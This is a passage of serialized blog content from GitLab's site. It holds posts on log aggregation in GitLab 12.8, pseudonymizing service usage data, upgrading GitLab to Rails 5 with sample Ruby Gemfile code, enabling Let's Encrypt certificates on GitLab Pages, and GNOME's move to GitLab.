Here's a first look at this new feature, released in GitLab 12.8.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666923/Blog/Hero%20Images/logs.png","https://about.gitlab.com/blog/unifylogsmetrics","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to integrate operation logs and metrics in GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dov Hershkovitch\"}],\n        \"datePublished\": \"2020-03-03\",\n      }",{"title":5087,"description":5088,"authors":5093,"heroImage":5089,"date":5095,"body":5096,"category":801,"tags":5097},[5094],"Dov Hershkovitch","2020-03-03","\nLogging is one of the most powerful tools we have when trying to understand an application problem. It is a common practice – when things go wrong in production, one of the first requests is often, \"Please send me the logs!\" Raw logs contain useful information which can help pinpoint the root cause(s) of problems.\n\nBut using raw logs isn’t always a straightforward process. This is especially true, in a modern, distributed, and often ephemeral architecture. Ideally logs should be available across the entire application, be searchable and offer at least some access to past history. Historically aggregated logging solutions, if they existed, were only piecemeal. 
This forced developers to spend time and energy tracking down important log data which ultimately resulted in logs being far less useful than they could be.\n\nWith the [12.8 release](/releases/2020/02/22/gitlab-12-8-released/), to ease navigating through logs, we added [Elastic log Stack](https://docs.gitlab.com/ee/integration/advanced_search/elasticsearch.html) as our log aggregation tool and [Log Explorer](/releases/2020/02/22/gitlab-12-8-released/#explore-aggregated-logs) so you can interact with all your logs in one place.\n\nBut before we look at the logging capabilities, let’s take a step back and look at the big picture.\n\n##  Why monitoring matters\n\nAt GitLab, we aim to provide users with a complete [DevSecOps platform](/solutions/security-compliance/), delivered as a single application. To do so, we have divided the DevSecOps lifecycle into [ten different stages](/stages-devops-lifecycle/). The final Ops stage of the [DevOps](/topics/devops/) loop, [Monitor](/direction/monitor/), should occur right after the production environment is configured and the application deployed. This is a critical stage that should not be ignored.\n\nIn fact, it’s commonly believed in the DevOps world that no developer should ship code into production without monitoring, as it will help ensure an application behaves as expected. If something isn’t right, you will be alerted, (hopefully before your users start to complain). If you are thinking about ignoring monitoring, always remember _customers_ are the most expensive monitoring solution you can have.\n\n### Chasing Observability\n\nObservability is the ability to infer internal states of a system based on the system’s external outputs. Monitoring, on the other hand is the activity of observing the state of a system over time. To achieve observability, your system’s telemetries, including metrics, traces, and logs should all be available to enable proactive introspection and enable greater operational visibility. 
We believe that DevOps practitioners should have observability as a goal.\n\nGitLab’s vision for the Monitor category is to build a consolidated and integrated observability tool which will, over time, displace today's front-runner in modern observability. In pursuit of this vision and to focus our efforts, we are building our solutions with a cloud native first principle to solve the cloud native problem by selecting the open source products which are cloud native compatible. And, in fact, as part of GitLab’s [New Year’s gift for 2020](/blog/observability/) we're moving a big portion of the observability features – custom metrics, logging, tracing and alerting – from our proprietary codebase to the open source codebase this year.\n\n### Metrics & Traces\n\nToday, if you use GitLab to deploy your application into a Kubernetes cluster, with a push of a button you can deploy monitoring (via a Prometheus instance) into that cluster. [Prometheus](https://prometheus.io/) will automatically start collecting key metrics from your deployed application (such as latency, error rate, and throughput), and send it directly into GitLab UI. In addition to the out-of-the-box metrics and dashboard, it is possible to customize Prometheus directly from the GitLab UI (using PromQL) to collect any metric you desire and present it on a dashboard. You can set up a threshold, create an alert on it, and open an issue as a part of an incident management solution, all without leaving the GitLab UI.\n\nAs a developer, when there is an issue - you want to drill down to the exact function or micro service that is causing the trouble. GitLab uses [Jaeger](https://www.jaegertracing.io/), an end-to-end distributed tracing system for microservices-based distributed systems.\n\n## Get started with logs\n\nBefore the 12.8 release, existing Monitor stage users already had the ability to view pod logs directly from within the GitLab UI. However, this was done only through the available Kubernetes APIs. 
Viewing logs with the Kubernetes APIs is limited to allowing a log-tailing experience on a specific pod from multiple environments only.\n\nWith the 12.8 release any user can deploy Elastic stack - a specific flavor of Elasticsearch alongside a component called [Filebeat](https://www.elastic.co/beats/filebeat) - to a Kubernetes cluster with the push of a button, (similar to the way we deploy Prometheus). Once deployed, it automatically starts collecting all logs that are coming from the cluster and applications across the available environments (production, staging, testing, etc.) and they will be surfaced in the GitLab UI. In addition users can also navigate directly from the metric chart to the log explorer while preserving the context.\n\nThis is extremely critical when triaging an incident or validating the status of your service. In the cloud-native world aggregation of logs for observability becomes critical as logs are distributed across multiple pods and services. Using our new solution you will be able to get an aggregated view of all logs across multiple services and infrastructures, go back in time, search through logs, and more.\n\n##  What's next\n\nI hope you found this overview useful. To get started, download GitLab and read its documentation for more in-depth coverage of the functionality. One of the fastest ways to experience GitLab features is to use the .com version — which is a hosted GitLab.\n\nIf you would like to get in touch with the Monitoring team please comment and contribute to the linked [issues](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=group%3A%3Aapm&label_name[]=Category%3ALogging) and [epics](https://gitlab.com/groups/gitlab-org/-/epics?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=group%3A%3Aapm&label_name[]=Category%3ALogging) on this page. 
Sharing your feedback directly on GitLab.com is the best way to contribute to our strategy and vision.\n\nIf you're a GitLab user and have direct knowledge of your logging usage, we'd especially love to hear your use case(s).\n\nWatch my entire YouTube video on logging:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/hWclZHA7Dgw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[1038,9,1099],{"slug":5099,"featured":6,"template":689},"unifylogsmetrics","content:en-us:blog:unifylogsmetrics.yml","Unifylogsmetrics","en-us/blog/unifylogsmetrics.yml","en-us/blog/unifylogsmetrics",{"_path":5105,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5106,"content":5111,"config":5116,"_id":5118,"_type":14,"title":5119,"_source":16,"_file":5120,"_stem":5121,"_extension":19},"/en-us/blog/updates-to-de-identifying-service-usage-data",{"title":5107,"description":5108,"ogTitle":5107,"ogDescription":5108,"noIndex":6,"ogImage":1090,"ogUrl":5109,"ogSiteName":673,"ogType":674,"canonicalUrls":5109,"schema":5110},"Updates to de-identifying Service Usage Data","GitLab is creating a process to pseudonymize directly identifiable Service Usage Data for SaaS customers. 
There will be no changes to the service data usage policy.","https://about.gitlab.com/blog/updates-to-de-identifying-service-usage-data","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Updates to de-identifying Service Usage Data\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-10-08\",\n      }",{"title":5107,"description":5108,"authors":5112,"heroImage":1090,"date":5113,"body":5114,"category":930,"tags":5115},[970],"2021-10-08","GitLab has been working on a process to intentionally limit our own ability to identify individual users from [Service Usage Data](/handbook/legal/privacy/customer-product-usage-information/) in order to protect user privacy even better. Earlier this year, we [solicited input](/blog/gitlab-plans-to-de-identify-service-usage-data/) on plans to de-identify GitLab’s Service Usage Data. We are now ready to move forward with a new system to de-identify SaaS usage data before it enters GitLab’s internal analytics environment.\n\n## What isn’t changing?\n\nThe service usage data policy for SaaS and Self-Managed remains unchanged.\n\n## What is changing?\n\nWith user privacy in mind, we are building a pseudonymization process to run against our SaaS service usage data.\n\nWe have determined that we do not need fully identifiable information anymore for our analytics environment, and as such we are pursuing this approach that will result in better privacy for GitLab users.\n\nWe’ll create a [one-way hash](https://gitlab.com/groups/gitlab-org/-/epics/6309#one-way-hashing) or [transform directly identifiable data](/handbook/product/product-intelligence-guide/#data-used-as-identifiers). 
This means that the data will be hashed at the collection layer before it is sent to our analytics environment.\n\nYou can read more details about our pseudonymization solution [here](https://gitlab.com/groups/gitlab-org/-/epics/6309). Once our pseudonymization solution is in place, we will update data we collect to ensure it follows the  solution. You can read more about what data we collect and its de-identification state [here](/handbook/product/product-intelligence-guide/#data-used-as-identifiers).\n\n## Timeline and implementation\n\nWe’re planning to roll out these changes in October 2021. Keep an eye on our [Product Intelligence roadmap](/handbook/product/product-intelligence-guide/service-usage-data-commitment/#roadmap) to monitor our progress. Once complete, we’ll update this blog post with the final status.\n\n## More information\n\nPlease find more information [about our privacy policy](/privacy/). Further details on how service usage data is used for product improvement can be found on our [Product Direction page](/direction/analytics/product-intelligence/). 
Also see  GitLab’s [analytics environment and SaaS Data Collection Catalog](/handbook/product/product-intelligence-guide/#saas-data-collection-catalog).\n\nPlease share your questions on the [community forum](https://forum.gitlab.com/t/updates-to-de-identifying-service-usage-data/59456).\n",[974,865,9],{"slug":5117,"featured":6,"template":689},"updates-to-de-identifying-service-usage-data","content:en-us:blog:updates-to-de-identifying-service-usage-data.yml","Updates To De Identifying Service Usage Data","en-us/blog/updates-to-de-identifying-service-usage-data.yml","en-us/blog/updates-to-de-identifying-service-usage-data",{"_path":5123,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5124,"content":5130,"config":5136,"_id":5138,"_type":14,"title":5139,"_source":16,"_file":5140,"_stem":5141,"_extension":19},"/en-us/blog/upgrade-to-rails5",{"title":5125,"description":5126,"ogTitle":5125,"ogDescription":5126,"noIndex":6,"ogImage":5127,"ogUrl":5128,"ogSiteName":673,"ogType":674,"canonicalUrls":5128,"schema":5129},"The road to Rails 5","Senior Backend Engineer Jan Provaznik shares some of the challenges we encountered when upgrading GitLab to Rails 5 – and how we overcame them.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683399/Blog/Hero%20Images/road-to-rails-5.jpg","https://about.gitlab.com/blog/upgrade-to-rails5","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The road to Rails 5\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jan Provaznik\"}],\n        \"datePublished\": \"2019-05-28\",\n      }",{"title":5125,"description":5126,"authors":5131,"heroImage":5127,"date":5133,"body":5134,"category":801,"tags":5135},[5132],"Jan Provaznik","2019-05-28","\nWith [Rails 6 coming soon](https://weblog.rubyonrails.org/2018/12/20/timeline-for-the-release-of-Rails-6-0/) it's a good time to look back at the journey we took when upgrading GitLab to Rails 5, which 
was not so long ago.\n\n[Our issue for upgrading to Rails 5](https://gitlab.com/gitlab-org/gitlab-ce/issues/14286) was around for quite a while, largely because it was difficult to switch such a big project as GitLab instantly to the next major version. Here is a brief story about how we solved this upgrade challenge.\n\n## Our solution? Cut it into pieces\n\nThe upgrade to Rails 5 was first prepared as a one big merge request. The nice thing about this approach is that when the merge request is ready, you can just merge the single merge request without dealing with any backward compatibility. The [first attempt](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/5555) had lower priority and it was later replaced with a [second attempt](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/12841). But for the GitLab codebase this merge request became pretty big: 151 commits, over 120 pushes, and more than 1000 changed files. Then it was almost impossible to get such merge request ready to be merged and keep it up to date without hitting problems with conflicts.\n\nRather than trying to get the upgrade done in a single merge request, a couple of changes made it possible to run the application either on Rails 4 or 5 depending on an environment variable. The application was still running on Rails 4 by default, but we were able to run it on Rails 5 either locally or in CI just by setting `RAILS5` and `BUNDLE_GEMFILE` environment variables. This allowed us to split the upgrade into many small issues. Typically each issue addressed one specific type of error in CI, so with each fix there were fewer failing tests in CI. Another major benefit was that then it was significantly easier to split the work between more people and to get an overview of who was working on what issue.\n\nA Rails version-specific Gemfile was loaded depending on the `RAILS5` and `BUNDLE_GEMFILE` environment variable. 
Here is an example of [enabling Rails 5 in rspec](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/18140):\n\n```ruby\ngemfile = %w[1 true].include?(ENV[\"RAILS5\"]) ? \"Gemfile.rails5\" : \"Gemfile\"\nENV['BUNDLE_GEMFILE'] ||= File.expand_path(\"../#{gemfile}\", __dir__)\n```\n\nThe content of [Gemfile.rails5](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/17761):\n\n```ruby\n# BUNDLE_GEMFILE=Gemfile.rails5 bundle install\n\nENV[\"RAILS5\"] = \"true\"\n\ngemfile = File.expand_path(\"../Gemfile\", __FILE__)\n\neval(File.read(gemfile), nil, gemfile)\n```\n\nAnd the Gemfile:\n\n```ruby\ndef rails5?\n  %w[1 true].include?(ENV[\"RAILS5\"])\nend\n\ngem_versions = {}\ngem_versions['activerecord_sane_schema_dumper'] = rails5? ? '1.0'      : '0.2'\ngem_versions['default_value_for']               = rails5? ? '~> 3.0.5' : '~> 3.0.0'\ngem_versions['html-pipeline']                   = rails5? ? '~> 2.6.0' : '~> 1.11.0'\ngem_versions['rails']                           = rails5? ? '5.0.6'    : '4.2.10'\ngem_versions['rails-i18n']                      = rails5? ? '~> 5.1'   : '~> 4.0.9'\n```\n\nThere were situations when a fix for Rails 5 was not compatible with Rails 4 and two different versions of code were needed, typically an Active Record query. For this purpose we used a simple helper method `Gitlab.rails5?` to check which version was being used and added code for each version. 
It was pretty easy to remove all Rails 4-compatible code in the cleanup phase when we upgraded to Rails 5 just by searching for `Gitlab.rails5?` in our codebase.\n\nAn example of the check used in `lib/gitlab/database.rb`:\n\n```ruby\ndef self.cached_table_exists?(table_name)\n  if Gitlab.rails5?\n    connection.schema_cache.data_source_exists?(table_name)\n  else\n    connection.schema_cache.table_exists?(table_name)\n  end\nend\n```\n\n## Upgrade process\n\nTo be able to address upgrade issues in small, separate pieces, we did the following steps during the upgrade process:\n\n* [Allowed GitLab to run both with Rails 4 and 5](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/17761), but keep Rails 4 default.\n* We also [added support both for Rails 4 and 5 into GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/merge_requests/497).\n* Fixed all issues until it fully worked with Rails 5 and CI was green.\n* Did manual testing to make sure everything will work after the upgrade.\n* [Switched to Rails 5 by default](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/21492), (but kept Rails 4 code).\n* Still enforced compatibility with Rails 4 (by running CI both with Rails 4 and 5) in case we had to switch back because of a blocker issue.\n* Dropped Rails 4 compatibility when we were sure everything worked. Releases are done monthly, so we removed Rails 4 code after the next release.\n\n## Major challenges\n\n### Active Record changes\n\nIn some places we use `Arel` directly and there were various incompatible changes (e.g. [`IN` statement issue](https://github.com/rails/arel/issues/531) solved by [this fix](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/19796)) which caused some of our SQL queries to stop working on Rails 5. (Almost) all of them were discovered during the preparation phase thanks to good test coverage. 
A list of [database-related changes is here](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?label_name%5B%5D=rails5&label_name%5B%5D=database&scope=all&state=all).\n\n### Monkey patches\n\nWe keep various monkey patches (either not-merged-yet upstream fixes or custom extensions), many of which required refactoring with the major upgrade. The positive is that we were able to get rid of some of them.\n\n### Keeping Rails 5 CI green\n\nThere was quite a long period between the moment we had all Rails 5 issues fixed and the moment we really switched the master branch to Rails 5.\nDuring this period we used a scheduled pipeline which ran daily on CE and EE master branches on Rails 5, so we knew quickly when a new incompatibility issue was introduced.\nAnother option was running CI jobs both for Rails 4 and 5 for each merge request and making it mandatory to pass all jobs. The disadvantage of this option was it would take twice as much time to run CI.\n\nUnfortunately there were many new incompatibility issues introduced during this period. Next time it would be better to run CI for each merge request, both with Rails 4 and 5, although it would require twice as much CI runtime.\n\n## Production release\n\nOnce we had all known issues in our codebase fixed, we still had additional steps to make sure we didn't hit a critical issue when releasing the next version. [We tracked these steps in this issue](https://gitlab.com/gitlab-org/gitlab-ce/issues/48991). We switched master branches to Rails 5 at the beginning of the development cycle (each cycle is one month long). We then ran CI jobs both with Rails 5 (default) and 4 (to keep backward compatibility). Timing was important because during the development cycle we discovered a couple of issues and we had enough time to fix them before release. 
After the release of the next version (11.6), when we were sure that we would not have to switch back to Rails 4, we removed Rails 4 both from CI and from the codebase.\n\nAlthough it took longer than expected, I think this upgrade was successful because it didn't cause any production issues. There were a few [major issues](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=closed&label_name[]=rails5&label_name[]=P1) discovered after switching the master branch, but we were able to fix them quickly before release.\n\nThis upgrade was done with huge help from our community – especially [@blackst0ne](https://gitlab.com/blackst0ne) and [@jlemaes](https://gitlab.com/jlemaes). Thank you!\n\n## Next steps\n\n* The upgrade to Rails 5.1 is [happening now](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24852).\n* The upgrade to Rails 5.2 is [still in progress](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/8877) – unfortunately there are many incompatibilities.\n\nBecause upgrades to 5.1 and 5.2 should be relatively small, we aim to do each upgrade in a single merge request. 
The upgrade to Rails 6 is expected to be bigger, so hopefully the same approach we used for Rails 5 upgrade will be useful in this case too.\n\nPhoto by Cody Board on [Unsplash](https://unsplash.com/photos/2hu-SSktidc)\n{: .note}\n",[779,1802,9,267],{"slug":5137,"featured":6,"template":689},"upgrade-to-rails5","content:en-us:blog:upgrade-to-rails5.yml","Upgrade To Rails5","en-us/blog/upgrade-to-rails5.yml","en-us/blog/upgrade-to-rails5",{"_path":5143,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5144,"content":5149,"config":5154,"_id":5156,"_type":14,"title":5157,"_source":16,"_file":5158,"_stem":5159,"_extension":19},"/en-us/blog/using-gitlab-pages-lets-encrypt",{"title":5145,"description":5146,"ogTitle":5145,"ogDescription":5146,"noIndex":6,"ogImage":857,"ogUrl":5147,"ogSiteName":673,"ogType":674,"canonicalUrls":5147,"schema":5148},"GitLab and Let's Encrypt partner to improve website security","Learn how to add a Let's Encrypt TLS certificate to a website hosted and managed via GitLab Pages.","https://about.gitlab.com/blog/using-gitlab-pages-lets-encrypt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and Let's Encrypt partner to improve website security\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"},{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2022-09-29\",\n      }",{"title":5145,"description":5146,"authors":5150,"heroImage":857,"date":5151,"body":5152,"category":865,"tags":5153},[1372,2909],"2022-09-29","\n\n[Let's Encrypt](https://letsencrypt.org/), a free, automated, and open certificate authority, is integrated with GitLab to help DevOps teams encrypt web traffic and protect the confidentiality of information their users share with websites.\n\nThis article explains, step by step, how to add a Let's Encrypt Transport Layer Security 
([TLS](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/ssl_tls_concepts.html)) certificate to a website hosted and managed via GitLab Pages.\n\n## What is TLS?\n\nTLS is a protocol designed to make the internet more secure. Now more than two decades old, TLS, which evolved from Secure Sockets Layer (SSL), helps ensure that when users connect to websites — and transmit potentially sensitive data to and from those websites — they are doing so over a secure connection.\n\nIt's an important protocol because internet connections aren't necessarily secure by default. Malicious actors can intervene in the internet connection made to retrieve web pages, and then they can view or even manipulate the data traveling through that connection. To minimize the chance of that happening, DevOps teams need to enable a way to guarantee - to certify - that the connection is genuine and secure.\n\nThat's where TLS comes in.\n\n## How does TLS work?\n\nTLS consists of several components, one of which is [a digital certificate](https://www.digicert.com/what-is-an-ssl-certificate), the goal of which is to secure data flowing to and from a website and help users trust in the integrity and confidentiality of that data.\n\nThe website or domain controller can install that certificate on a web server so that a user visiting the site can view it and feel assured their connection to the website is secure. The controller will ask a certifying body — called a certificate authority, or CA — to electronically sign and verify the certificate to indicate that the person or organization has control over the domain. Users can then view the certificate's details to scrutinize the connection.\n\nTo do this, simply load any TLS-protected website in a browser (\"https://\" will appear in the URL where the \"s\" indicates a secure connection), and, typically, a \"lock\" icon in the browser's URL bar. 
Clicking on that lock reveals certificate details.\n\nAs long as users trust the body that issued the certificate, they can feel more confident their connection to the website is secure. \n\n![GitLab's website, indicating the secure connection by clicking on the lock icon in the URL bar](https://about.gitlab.com/images/blogimages/secureeasy-blog-post-image-1.png)\n\n\nGitLab's website is delivered over a secure connection.\n{: .note.text-center}\n\n\n![GitLab's website indicating the security certificate is valid in the lock icon on the URL browser bar](https://about.gitlab.com/images/blogimages/secureeasy-blog-post-image-2.png)\n\n\nGitLab's website security certificate is valid.\n{: .note.text-center}\n\n\n## Let's Encrypt and TLS certificates\n\nHistorically, obtaining TLS certificates was a complicated and costly endeavor.\n\n[Let's Encrypt formed in 2013](https://www.crn.com/news/cloud/300074840/lets-encrypt-a-free-and-automated-certificate-authority-comes-out-of-stealth-mode.htm) to ensure everyone had access to the benefits of encryption. Part of the nonprofit [Internet Security Research Group](https://www.abetterinternet.org/), Let's Encrypt aims to simplify the process of issuing, installing, configuring, and managing TLS certificates. By doing so, it hopes to create an internet that is [more privacy-respecting and secure](https://letsencrypt.org/about/). \n\nLet's Encrypt is an open and secure certificate authority that makes the process of obtaining and applying TLS certificates easy, automated, and free for website administrators. 
GitLab's integration with Let's Encrypt enables anyone hosting a webpage using GitLab Pages to obtain and apply a TLS certificate with a single click.\n\n## Securing a website with GitLab Pages and Let's Encrypt\n\n[GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/index.html) allows anyone with a GitLab project to host and maintain a static website and, with [the help of Let's Encrypt](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.html), do so securely.\n\nTo start, create a GitLab pages website:\n\n- Create [a new project](https://docs.gitlab.com/ee/user/project/pages/index.html#how-it-works) (or [fork a sample project](https://docs.gitlab.com/ee/user/project/pages/getting_started/pages_new_project_template.html)) in your GitLab namespace.\n- Add your website's source code to that project.\n- Register a personal domain name, add it to the project, and [verify it](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/index.html#set-up-pages-with-a-custom-domain).\n\nYou're now ready to [add a TLS certificate](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/index.html#adding-an-ssltls-certificate-to-pages) to your site [with Let's Encrypt](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.html).\n\n* Navigate to your project's Settings, then choose Pages.\n* Find the domain you want to secure and select Details.\n* Click Edit in the top-right corner to modify those details.\n* Click the switch to activate Automatic certificate management using Let's Encrypt.\n* Click Save to save your changes.\n\nAnd that's it. Really.\n\nThe only thing left to do is wait. Obtaining a Let's Encrypt certificate for a website can take up to an hour. 
But once you've acquired one, you'll see the certificate information underneath the domain name listed in your Pages settings.\n\nAdditionally, you can enhance your website's security by forcing incoming traffic to connect to it securely. Just tick the box to enable \"Force HTTPS\".\n\n## Contributing to a more secure internet\n\nThe internet is an incredibly valuable tool, but with that value comes complexity. Let’s Encrypt provides digital certificates to more than 290 million websites, working to create an internet that is more secure and respectful of the privacy of its users. \n\nAt GitLab, we believe that [everyone can contribute](/company/mission/#everyone-can-contribute) — and that includes contributing to a safer, more secure internet. By obtaining and setting up a TLS certificate, DevOps teams benefit from and contribute to the adoption of internet encryption. Internet security shouldn’t be difficult, and GitLab hopes that our integration with Let’s Encrypt supports a more secure internet for everyone.\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/_wasba1jCoI\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n",[9,865,267],{"slug":5155,"featured":6,"template":689},"using-gitlab-pages-lets-encrypt","content:en-us:blog:using-gitlab-pages-lets-encrypt.yml","Using Gitlab Pages Lets Encrypt","en-us/blog/using-gitlab-pages-lets-encrypt.yml","en-us/blog/using-gitlab-pages-lets-encrypt",{"_path":5161,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5162,"content":5167,"config":5172,"_id":5174,"_type":14,"title":5175,"_source":16,"_file":5176,"_stem":5177,"_extension":19},"/en-us/blog/welcome-gnome-to-gitlab",{"title":5163,"description":5164,"ogTitle":5163,"ogDescription":5164,"noIndex":6,"ogImage":2768,"ogUrl":5165,"ogSiteName":673,"ogType":674,"canonicalUrls":5165,"schema":5166},"GNOME, welcome to GitLab!","We’re 
excited to welcome free software project GNOME to the GitLab community.","https://about.gitlab.com/blog/welcome-gnome-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GNOME, welcome to GitLab!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-05-31\",\n      }",{"title":5163,"description":5164,"authors":5168,"heroImage":2768,"date":5169,"body":5170,"category":10,"tags":5171},[1859],"2018-05-31","\n\nGNOME, one of the most recognized, respected projects in the open source world, [has moved to GitLab](https://www.gnome.org/news/2018/05/gnome-moves-to-gitlab-2/) to manage their more than 400 software projects and nearly 900 annual contributors. We couldn’t be happier to welcome the GNOME community! The migration is great news for both our communities, and we hope it’s just the beginning of a long and productive partnership.\n\n[_Want to hear how it's going for GNOME now? We caught up with the project in September 2020_](/blog/gnome-follow-up/).\n{: .alert .alert-info .text-center}\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/v6GTrbfe9xk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\u003C/figure>\n\n## A catalyst for change\n\nLast year we were approached by developers of [Debian](/blog/automated-debian-package-build-with-gitlab-ci/) to consider dropping our Contributor License Agreement (CLA) in favor of the Developer’s Certificate of Origin (DCO). In November [we announced that we’d be switching to a DCO](/blog/gitlab-switches-to-dco-license/), and we’re happy that this change has been welcomed by the GNOME community too:\n\n>\"We applaud GitLab for dropping their CLA in favor of a more OSS-friendly approach. 
Open source communities are born from a sea of contributions that come together and transform into projects. This gesture affirmed GitLab's willingness to protect the individual, their creative process, and most importantly, keeps intellectual property in the hands of the creator.\" - Carlos Soriano, Board Director at GNOME\n\n## About GNOME\n\nGNOME software is used by millions of people worldwide, and is one of the largest and oldest free software projects. It’s best known for its desktop, which is a key part of the most popular GNU/Linux distributions, including Ubuntu, Debian, SUSE, and Fedora. However, the project also has a long history of producing critical pieces of software infrastructure: common parts of countless open source systems that are often taken for granted. Many essential, ubiquitous technologies began their life in the GNOME project, and have gone on to become the essential ingredients for a diverse range of products, communities, and companies. These include Mono, FOSS C# implementation used by Xamarin, a core team of Microsoft; and Inotify, Linux kernel file monitoring.\n\n“Throughout its history, the GNOME project has been the training ground for software engineers and contributors who have gone on to play important roles elsewhere,” says Nuritzi Sanchez, president of GNOME’s board of directors and core member of the engagement team. “With a focus on quality engineering, design-driven development, and system-level plumbing, GNOME serves as an excellent environment for new contributors, and GNOME alumni hold positions at Google, Apple, Microsoft, Red Hat, innovative startups, and beyond.”\n\nGNOME's software is found in televisions, e-book readers, in-vehicle infotainment systems, medical devices, and much more. The project continues to produce new, innovative technologies which are transforming the Linux ecosystem. 
Recent innovations include Flatpak and the accompanying app store, Flathub, which enables applications to run on any Linux-based operating system.\n\n## So, why GitLab?\n\nBefore migrating, GNOME used a broad range of tools to fulfil a number of specific purposes – from [CGit for hosting to Bugzilla for bug tracking](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure/ExistingState) – but the number of tools made the onboarding experience for new contributors cumbersome and confusing. They started looking for a single tool to meet more of their needs to make this process easier and to improve their own workflows.\n\n“We did an [extensive analysis](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure) of multiple tools as we considered a solution that would fit all the requirements of an organization as big as GNOME,” says Nuritzi. “We had a set of hard requirements, with the most important one being that it must be free software, ideally not only in license but also in spirit.”\n\nYou can check out [their analysis](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure) for a full account of the decision-making process.\n\n## What does the move mean for GNOME?\n\nGNOME was looking for a way to make it easier for newcomers to contribute, and they got it.\n\n“With a modern and familiar interface with well-designed tools, using GitLab makes the GNOME community more approachable – especially to a new generation of newcomers that is used to products that are modern-looking and easy to use,” says Nuritzi. 
They’ve also noticed that by using a single tool and having everyone under the same roof (as it were!), there’s more opportunity for teams to work together and cross-pollinate, resulting in a more engaged and collaborative community.\n\n### Better together\n\nApart from an easier workflow for newcomers and improved collaboration and cohesion between teams, GNOME has picked up on an unexpected benefit: the return of old projects and an influx of new ones. The ease of creating personal projects in GitLab has fostered better proximity between GNOME’s community of developers and [projects](https://gitlab.gnome.org/explore/groups), even if they aren’t part of the official GNOME project. “This allows those projects to be closer to our community of developers and products, and helps us increase our reach,” says Nuritzi. “We’re also very pleased to see that some major Linux distributions have begun to move part of their operations to groups in GNOME’s GitLab. This has allowed more collaboration between GNOME and these distributions, and is a great step forward in helping to create a tighter-knit broader community.”\n\nThis improved closeness and reach is what we’re really excited about – when it comes to open source communities using GitLab, the more the merrier we say! It’s our hope that the boost in collaboration and networking GNOME has experienced will extend to our own community, as well as those of other open source projects moving to GitLab.\n\n## How to contribute\n\nIn keeping with our own vision of “everyone can contribute,” GNOME has opportunities for contributors from all backgrounds. “If you like marketing and community management, we have the engagement team, if you’re into doing translations and documentation, we have the teams for that. If you like designing software, we have the design team. And if you want to contribute code, there are many projects with maintainers who welcome newcomers and can help answer the questions they may have,” says Nuritzi. 
